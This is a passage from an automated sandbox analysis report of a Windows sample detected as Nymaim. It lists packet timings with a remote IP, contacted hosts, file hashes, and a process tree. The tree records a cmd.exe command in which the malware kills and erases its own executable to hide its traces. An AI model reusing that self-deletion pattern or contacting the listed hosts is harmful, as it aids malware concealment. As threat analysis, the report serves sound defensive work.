                Jan 5, 2023 09:17:07.922629118 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:07.922785044 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:07.923264027 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:07.950546980 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:07.950826883 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:07.950993061 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:07.993654013 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.021770954 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.021858931 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.021920919 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.021958113 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.021982908 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.022022963 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.022089005 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.022104025 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.022141933 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.022177935 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.022231102 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.022253036 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.022308111 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.022329092 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.022372007 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.022401094 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.022454977 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.022476912 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.022533894 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.022552013 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.022604942 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.049844980 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.049933910 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.049982071 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050013065 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050044060 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050091028 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050122976 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050167084 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050198078 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050245047 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050272942 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050329924 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050348997 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050398111 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050425053 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050476074 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050504923 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050556898 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050580025 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050632000 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050658941 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050760031 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050781012 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050812006 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050853014 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050905943 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.050928116 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.050978899 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.051002026 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.051053047 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.051074028 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.051125050 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.051150084 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.051206112 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.051224947 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.051280022 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.051300049 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.051362991 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.051378965 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.051413059 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.078811884 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.078901052 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.078959942 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079025984 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079044104 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079073906 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079087973 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079133034 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079194069 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079214096 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079255104 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079288006 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079345942 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079364061 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079415083 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079448938 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079504967 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079524040 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079579115 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079598904 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079653978 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079674959 CET8049697107.182.129.235192.168.2.4
                Jan 5, 2023 09:17:08.079725027 CET4969780192.168.2.4107.182.129.235
                Jan 5, 2023 09:17:08.079749107 CET8049697107.182.129.235192.168.2.4

                HTTP Request Dependency Graph

                • 45.139.105.171
                • 107.182.129.235
                • 171.22.30.106

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:09:16:58
                Start date:05/01/2023
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\file.exe
                Imagebase:0x400000
                File size:1970815 bytes
                MD5 hash:4206F8B371294F11B01592ACC7BB338D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Target ID:1
                Start time:09:16:59
                Start date:05/01/2023
                Path:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
                Imagebase:0x400000
                File size:778752 bytes
                MD5 hash:E8176050192FBB976D70238E3C121F4C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Target ID:2
                Start time:09:17:02
                Start date:05/01/2023
                Path:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Imagebase:0x400000
                File size:3299023 bytes
                MD5 hash:D26C02425FA67FBDC0E4B4D5D6FA6088
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                General

                Target ID:3
                Start time:09:17:06
                Start date:05/01/2023
                Path:C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
                Wow64 process (32bit):true
                Commandline:
                Imagebase:0x1300000
                File size:73728 bytes
                MD5 hash:3FB36CB0B7172E5298D2992D42984D06
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 50%, ReversingLabs
                Reputation:high

                General

                Target ID:4
                Start time:09:17:36
                Start date:05/01/2023
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Imagebase:0xd90000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:5
                Start time:09:17:36
                Start date:05/01/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:6
                Start time:09:17:36
                Start date:05/01/2023
                Path:C:\Windows\SysWOW64\taskkill.exe
                Wow64 process (32bit):true
                Commandline:taskkill /im "SplitFiles131.exe" /f
                Imagebase:0x1f0000
                File size:74752 bytes
                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                No disassembly